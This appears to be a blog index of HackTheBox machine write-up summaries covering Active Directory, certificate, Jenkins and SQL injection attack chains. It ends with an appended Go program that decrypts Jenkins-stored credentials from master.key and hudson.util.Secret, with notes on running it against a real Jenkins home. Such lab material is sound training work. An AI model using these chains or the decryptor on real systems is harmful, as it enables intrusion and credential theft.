Monteverde HTB machine cover image

HTB Monteverde - Azure AD Connect Password Extraction

Machine #48 on the Lain Kusanagi list. Active Directory, a forgotten config file, and the Azure AD Sync service doing what it really shouldn't.

Machine info: Name Monteverde · Platform HackTheBox · OS Windows · Difficulty Medium · IP 10.129.228.111 · Domain MEGABANK.LOCAL

TL;DR: A null session via nxc gives a full user list. A password spray with username=password lands SABatchJobs:SABatchJobs. Listing SMB shares reveals users$ is readable, and spider_plus finds mhope/azure.xml, a leftover Azure AD Connect config file with a cleartext password. Spraying that password gets us mhope over WinRM. mhope is in the Azure Admins group and the ADSync service is running locally, so a public PoC decrypts the ADSync connector credentials from the local MSSQL database, handing us Domain Administrator. ...

June 1, 2026 · 4 min · João Vítor Bonin
HackTheBox Giddy machine cover

HTB: Giddy

SQL injection doesn't always mean dumping a database. Sometimes it just means coaxing the server into making a network connection it shouldn't, and that is enough to steal credentials. Giddy is a good example of that, paired with a creative privesc that requires bypassing Windows Defender with a custom payload.

Machine info: Name Giddy · Platform HackTheBox · OS Windows · Difficulty Medium · IP 10.129.96.140

TL;DR: An ASP.NET MVC app has a search endpoint vulnerable to SQL injection. We use xp_dirtree to force SQL Server to authenticate outbound to our Responder instance, capturing Stacy's NTLMv2 hash. After cracking it, Evil-WinRM gives us a shell. On the machine a unifivideo folder hints at CVE-2016-6914: the Ubiquiti UniFi Video service runs taskkill.exe from a user-writable directory when it stops, so a planted binary executes with the service's SYSTEM privileges. Defender flags msfvenom output, so we cross-compile a custom Go payload that adds a local admin user, then RDP in as that user. ...

May 31, 2026 · 4 min · João Vítor Bonin
HTB Editorial machine cover

HTB: Editorial

Another medium box that starts with just a web form and ends with a root shell through a surprisingly elegant chain. Editorial is all about knowing what to look for, and what to ask the server to fetch for you.

Machine info: Name Editorial · Platform HackTheBox · OS Linux · Difficulty Medium · IP 10.129.1.101

TL;DR: SSRF in the book cover URL field → internal API on port 5000 → /api/latest/metadata/messages/authors leaks SSH creds for dev → git history in ~/apps reveals prod's credentials → prod can run a GitPython clone script as root → an ext:: transport URL injected into the clone makes git run our command, which sets SUID on /bin/bash → root. ...

May 22, 2026 · 5 min · João Vítor Bonin
HTB Escape machine cover

HTB: Escape

Machine info: Name Escape · Platform HackTheBox · OS Windows · Difficulty Medium · IP 10.129.228.253

TL;DR: An unauthenticated SMB Public share exposes a PDF containing SQL Server credentials. Connecting to MSSQL with them, we abuse xp_dirtree to make the service authenticate to our Responder listener, capture the NTLMv2 hash of sql_svc and crack it with John. From there, SQL Server error logs leave cleartext credentials for Ryan.Cooper lying around. As Ryan, certipy reveals an ESC1-vulnerable certificate template: Domain Users can enroll and supply their own subject alternative name, so we request a certificate as Administrator. One certificate later, we have the Administrator NT hash and land a SYSTEM shell via psexec. ...

May 22, 2026 · 4 min · João Vítor Bonin
HTB Certified machine avatar

HTB Certified - Active Directory Certificate Services and ESC9

Machine info: Name Certified · Platform HackTheBox · OS Windows · Difficulty Medium

You start this box with valid low-privilege domain credentials: judith.mader / judith09. The path to Administrator is a chain of ACL abuses through Active Directory: no CVE, no exotic exploit, just misplaced permissions and the right tooling.

TL;DR: judith.mader has WriteOwner on the Management group. That lets us take ownership, grant ourselves FullControl via a DACL edit, and add judith to the group. Management has GenericWrite on management_svc, so we use pywhisker to inject shadow credentials and retrieve its NTLM hash via PKINITtools. With management_svc on the box, BloodHound shows GenericAll on ca_operator; we reset its password, then exploit ESC9 with certipy to obtain a certificate that authenticates as Administrator. Final step: psexec as SYSTEM. ...

May 21, 2026 · 5 min · João Vítor Bonin
HTB Chatterbox machine avatar

HTB Chatterbox - AChat Buffer Overflow and Registry Credentials

Machine info: Name Chatterbox · Platform HackTheBox · OS Windows · Difficulty Medium

TL;DR: AChat 0.150 beta7 is running on a non-standard port with a known buffer overflow. A public Python PoC gets us a shell as alfred after generating an x86, unicode-compatible reverse shell payload with msfvenom. Once in, the registry gives away autologon credentials (Alfred:Welcome1!) that also work for Administrator: straightforward credential reuse to SYSTEM.

Recon: nmap -sC -sV -p- 10.129.1.92

Most of the ports are standard Windows noise (RPC, SMB). The interesting ones are 9255 and 9256, both identified as AChat. That is a Windows chat application that barely anyone runs outside of CTFs, which is a big hint there is something exploitable there. ...

May 21, 2026 · 3 min · João Vítor Bonin
Builder

HTB Write-up: Builder

Jenkins is one of those tools that organizations often spin up quickly and forget to harden. Builder is a medium-difficulty Linux box that shows exactly what happens when that oversight meets a known CVE and a stored credential that was not meant to be found.

Machine info: Name Builder · Platform HackTheBox · OS Linux · Difficulty Medium · IP 10.129.230.220

TL;DR: Jenkins 2.441 is vulnerable to arbitrary file read (CVE-2024-23897, the args4j @file expansion in the Jenkins CLI). Reading files off the server is enough to enumerate Jenkins users, steal a password hash, crack it, log in as that user and run a Groovy reverse shell from the Script Console. The shell lands inside a Docker container. There, the Jenkins home directory holds an encrypted SSH private key in credentials.xml. We use the pwn_jenkins offline decrypter with master.key and hudson.util.Secret to recover it, then SSH in as root. ...

May 20, 2026 · 4 min · João Vítor Bonin
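As an added example (not code from the Builder write-up and not pwn_jenkins's own script), the Go program below reproduces the offline decryption that last step relies on: SHA-256 of the master.key bytes, truncated to 16 bytes, AES-ECB-decrypts hudson.util.Secret; the marker ::::MAGIC:::: in the result confirms the key was right; and the first 16 bytes of that plaintext are the AES key for the version-1 (0x01-prefixed, AES-CBC) secrets stored in credentials.xml. Everything it consumes is constructed inline in fixture() in Jenkins' on-disk layout: the hex master.key string, the 0x42 key material, the IV and the fake private-key text are assumptions for the demo, not values from the box. Older ECB-format secrets without the 0x01 prefix are not handled.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// Jenkins appends this marker to the key material in hudson.util.Secret.
const magic = "::::MAGIC::::"

func pkcs7Pad(b []byte) []byte {
	p := byte(aes.BlockSize - len(b)%aes.BlockSize)
	return append(append([]byte{}, b...), bytes.Repeat([]byte{p}, int(p))...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || b[len(b)-1] == 0 || int(b[len(b)-1]) > len(b) {
		return nil, errors.New("bad PKCS#7 padding")
	}
	return b[:len(b)-int(b[len(b)-1])], nil
}

// ecb applies AES block by block; Go's stdlib deliberately ships no ECB mode.
func ecb(block cipher.Block, in []byte, decrypt bool) []byte {
	out := make([]byte, len(in))
	for i := 0; i+aes.BlockSize <= len(in); i += aes.BlockSize {
		if decrypt {
			block.Decrypt(out[i:i+aes.BlockSize], in[i:i+aes.BlockSize])
		} else {
			block.Encrypt(out[i:i+aes.BlockSize], in[i:i+aes.BlockSize])
		}
	}
	return out
}

// confidentialityKey reproduces Jenkins' derivation: SHA-256(master.key)[:16]
// decrypts hudson.util.Secret (ECB); the plaintext must contain magic, and its
// first 16 bytes are the key protecting secrets in credentials.xml.
func confidentialityKey(masterKey, hudsonSecret []byte) ([]byte, error) {
	hashed := sha256.Sum256(masterKey)
	block, _ := aes.NewCipher(hashed[:16]) // 16 bytes is always a valid AES-128 key
	plain := ecb(block, hudsonSecret, true)
	if len(hudsonSecret)%aes.BlockSize != 0 || !bytes.Contains(plain, []byte(magic)) {
		return nil, errors.New("magic marker missing: wrong master.key or corrupt secret file")
	}
	return plain[:16], nil
}

// decryptCredential decodes one {...} value in Jenkins' current secret format:
// 0x01 | iv_len (be32) | data_len (be32) | iv | AES-CBC(PKCS#7(plaintext)).
func decryptCredential(key []byte, encoded string) (string, error) {
	block, err := aes.NewCipher(key)
	raw, derr := base64.StdEncoding.DecodeString(strings.Trim(encoded, "{}"))
	if err != nil || derr != nil || len(raw) < 9 || raw[0] != 0x01 {
		return "", errors.New("bad key length or not a base64 version-1 secret")
	}
	ivLen, dataLen := int(binary.BigEndian.Uint32(raw[1:5])), int(binary.BigEndian.Uint32(raw[5:9]))
	if ivLen != aes.BlockSize || dataLen%aes.BlockSize != 0 || len(raw) < 9+ivLen+dataLen {
		return "", errors.New("malformed secret header")
	}
	iv, data := raw[9:9+ivLen], raw[9+ivLen:9+ivLen+dataLen]
	out := make([]byte, len(data))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, data)
	plain, err := pkcs7Unpad(out) // a wrong key usually surfaces here as garbage padding
	return string(plain), err
}

// fixture builds a constructed master.key / hudson.util.Secret / credential triple
// in Jenkins' on-disk layout so the decryptor runs offline. Real files hold random
// key material; these values are fixed assumptions for the demo.
func fixture() (masterKey, hudsonSecret []byte, encoded, plaintext string) {
	masterKey = []byte("6d81c1a8b4c1e8a7e4c3f1c0b2e5d9a1f0e3d2c1b0a9f8e7d6c5b4a3f2e1d0c9")
	keyMaterial := bytes.Repeat([]byte{0x42}, 256) // stands in for Jenkins' 256 random bytes
	hashed := sha256.Sum256(masterKey)
	mkBlock, _ := aes.NewCipher(hashed[:16])
	hudsonSecret = ecb(mkBlock, pkcs7Pad(append(keyMaterial, magic...)), false)
	plaintext = "-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed, not a real key)\n-----END OPENSSH PRIVATE KEY-----"
	iv, padded := []byte("0123456789abcdef"), pkcs7Pad([]byte(plaintext))
	data := make([]byte, len(padded))
	credBlock, _ := aes.NewCipher(keyMaterial[:16])
	cipher.NewCBCEncrypter(credBlock, iv).CryptBlocks(data, padded)
	hdr := []byte{0x01, 0, 0, 0, 16, 0, 0, 0, 0} // version 1, iv_len 16, data_len filled below
	binary.BigEndian.PutUint32(hdr[5:], uint32(len(data)))
	encoded = "{" + base64.StdEncoding.EncodeToString(append(append(hdr, iv...), data...)) + "}"
	return
}

func main() {
	mk, hs, enc, _ := fixture()
	key, err := confidentialityKey(mk, hs)
	if err != nil {
		panic(err)
	}
	fmt.Println(decryptCredential(key, enc))
}
```

Against a real Jenkins home, read master.key from secrets/master.key, hudson.util.Secret from secrets/hudson.util.Secret, and the {...} string from the privateKey or password element in credentials.xml; the magic check in confidentialityKey is what tells you whether a recovered master.key actually belongs to that secret file.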